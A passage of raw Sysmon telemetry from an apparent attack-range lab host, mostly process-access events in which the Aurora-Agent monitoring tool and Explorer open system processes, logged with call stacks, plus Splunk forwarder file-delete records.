Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.699{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000047111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.634{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEAD1EDA8E1DD8AF08E729FD93F6B824,SHA256=E86E849DA847761F0267DFF861BEB39BBD635A7B9D6378F4E50CE2A8AF234876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.561{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11C13BBD880BB132132ACB8CAF9B2923,SHA256=C9E3DEE5DE64413C6B0C14BC184DDA1889B8A8C7AD6777082E2C9D4523351215,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.516{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c3d3|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.516{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.516{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.516{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.515{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.515{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.515{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.515{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.515{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 